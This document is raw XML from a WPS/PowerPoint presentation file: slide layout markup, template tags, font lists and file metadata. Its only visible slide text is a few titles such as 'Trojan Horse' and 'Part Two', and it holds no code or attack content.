                <a:cs typeface="+mn-ea"/>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rPr>
              <a:t>Result</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微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="chrismas"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3039110" y="987425"/>
            <a:ext cx="6113780" cy="52749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marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Trojan Horse</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="09DEE9">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="微软雅黑 Light"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4E7442A-BA00-4274-AC47-95D95C23D1C8}" type="datetimeFigureOut">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" charset="-122"/>
              <a:cs typeface="+mn-cs"/>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solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="9600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" charset="-122"/>
              <a:cs typeface="+mn-cs"/>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charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Part Two</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" charset="-122"/>
              <a:cs typeface="+mn-cs"/>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charset="-122"/>
              <a:cs typeface="+mn-cs"/>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UNIT_TEXTBOXSTYLE_SHAPETYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTLEFT" val="0_-29.09998"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTTOP" val="0_-63.95001"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTWIDTH" val="100_58.19998"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTHEIGTH" val="100_109.65"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISNUMVISUAL" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISREFERUNIT" val="0"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="mixed20201941_294*i*1"/>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53.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_SHAPETYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTLEFT" val="10_-35.445"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTTOP" val="0_-63.95001"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISNUMVISUAL" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISREFERUNIT" val="0"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="mixed20201941_294*i*2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="mixed"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20201941"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_GUID" val="{b6114a12-4d76-4813-96de-34db54c419f7}"/>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8046_5*l_h_i*1_2_4"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_LINE_FORE_SCHEMECOLOR_INDEX" val="6"/>
  <p:tag name="KSO_WM_UNIT_LINE_FILL_TYPE" val="2"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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8046_5*l_h_i*1_1_4"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_LINE_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_LINE_FILL_TYPE" val="2"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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28046_5*l_h_i*1_4_4"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_LINE_FORE_SCHEMECOLOR_INDEX" val="8"/>
  <p:tag name="KSO_WM_UNIT_LINE_FILL_TYPE" val="2"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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28046_5*l_h_i*1_3_4"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_LINE_FORE_SCHEMECOLOR_INDEX" val="7"/>
  <p:tag name="KSO_WM_UNIT_LINE_FILL_TYPE" val="2"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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20228046_5*l_h_i*1_5_4"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_LINE_FORE_SCHEMECOLOR_INDEX" val="9"/>
  <p:tag name="KSO_WM_UNIT_LINE_FILL_TYPE" val="2"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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8046_5*l_h_i*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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8046_5*l_h_i*1_2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="6"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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28046_5*l_h_i*1_4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="8"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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28046_5*l_h_i*1_5_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="9"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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28046_5*l_h_i*1_3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="7"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="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228046_5*l_h_i*1_2_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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228046_5*l_h_i*1_1_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="diagram20228046_5*l_h_i*1_3_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="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5_2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="diagram20228046_5*l_h_i*1_5_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="diagram20228046_5*l_h_i*1_4_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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228046_5*l_h_i*1_2_3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="6"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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228046_5*l_h_i*1_1_3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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228046_5*l_h_i*1_3_3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="7"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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228046_5*l_h_i*1_4_3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="8"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="diagram20228046_5*l_h_i*1_5_3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228046"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="9"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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399.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMmY5MzdhMTM4MGYwZjY3MmUyNDAwYWI5ODI4MjA4MzUifQ=="/>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txDef>
      <a:spPr>
        <a:solidFill>
          <a:srgbClr val="07A7AF">
            <a:alpha val="5000"/>
          </a:srgbClr>
        </a:solidFill>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="l">
          <a:lnSpc>
            <a:spcPct val="110000"/>
          </a:lnSpc>
          <a:defRPr lang="en-US" sz="250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4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17316</Words>
  <Application>WPS Writer</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>608</Paragraphs>
  <Slides>33</Slides>
  <Notes>11</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>26</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>47</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>33</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="106" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>阿里巴巴普惠体 R</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Palatino Linotype</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>思源黑体 CN Bold</vt:lpstr>
      <vt:lpstr>黑体-简</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Lucida Sans</vt:lpstr>
      <vt:lpstr>苹方-简</vt:lpstr>
      <vt:lpstr>汉仪傲娇体简</vt:lpstr>
      <vt:lpstr>宋体-简</vt:lpstr>
      <vt:lpstr>思源黑体 CN Regular</vt:lpstr>
      <vt:lpstr>思源黑体 CN Heavy</vt:lpstr>
      <vt:lpstr>思源黑体 CN Normal</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>135_自定义设计方案</vt:lpstr>
      <vt:lpstr>143_自定义设计方案</vt:lpstr>
      <vt:lpstr>134_自定义设计方案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15_自定义设计方案</vt:lpstr>
      <vt:lpstr>16_自定义设计方案</vt:lpstr>
      <vt:lpstr>17_自定义设计方案</vt:lpstr>
      <vt:lpstr>18_自定义设计方案</vt:lpstr>
      <vt:lpstr>19_自定义设计方案</vt:lpstr>
      <vt:lpstr>20_自定义设计方案</vt:lpstr>
      <vt:lpstr>21_自定义设计方案</vt:lpstr>
      <vt:lpstr>22_自定义设计方案</vt:lpstr>
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>23_自定义设计方案</vt:lpstr>
      <vt:lpstr>24_自定义设计方案</vt:lpstr>
      <vt:lpstr>25_自定义设计方案</vt:lpstr>
      <vt:lpstr>26_自定义设计方案</vt:lpstr>
      <vt:lpstr>27_自定义设计方案</vt:lpstr>
      <vt:lpstr>28_自定义设计方案</vt:lpstr>
      <vt:lpstr>29_自定义设计方案</vt:lpstr>
      <vt:lpstr>30_自定义设计方案</vt:lpstr>
      <vt:lpstr>31_自定义设计方案</vt:lpstr>
      <vt:lpstr>32_自定义设计方案</vt:lpstr>
      <vt:lpstr>33_自定义设计方案</vt:lpstr>
      <vt:lpstr>34_自定义设计方案</vt:lpstr>
      <vt:lpstr>35_自定义设计方案</vt:lpstr>
      <vt:lpstr>36_自定义设计方案</vt:lpstr>
      <vt:lpstr>37_自定义设计方案</vt:lpstr>
      <vt:lpstr>2_Office 主题</vt:lpstr>
      <vt:lpstr>38_自定义设计方案</vt:lpstr>
      <vt:lpstr>39_自定义设计方案</vt:lpstr>
      <vt:lpstr>40_自定义设计方案</vt:lpstr>
      <vt:lpstr>41_自定义设计方案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dc:creator>
  <cp:lastModifiedBy>Fangtian Zhong</cp:lastModifiedBy>
  <cp:revision>106</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-25T21:14:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-25T21:14:18Z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A1378116E481472FA6251A948E06C9AB_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-4.9.0.7859</vt:lpwstr>
  </property>
</Properties>
</file>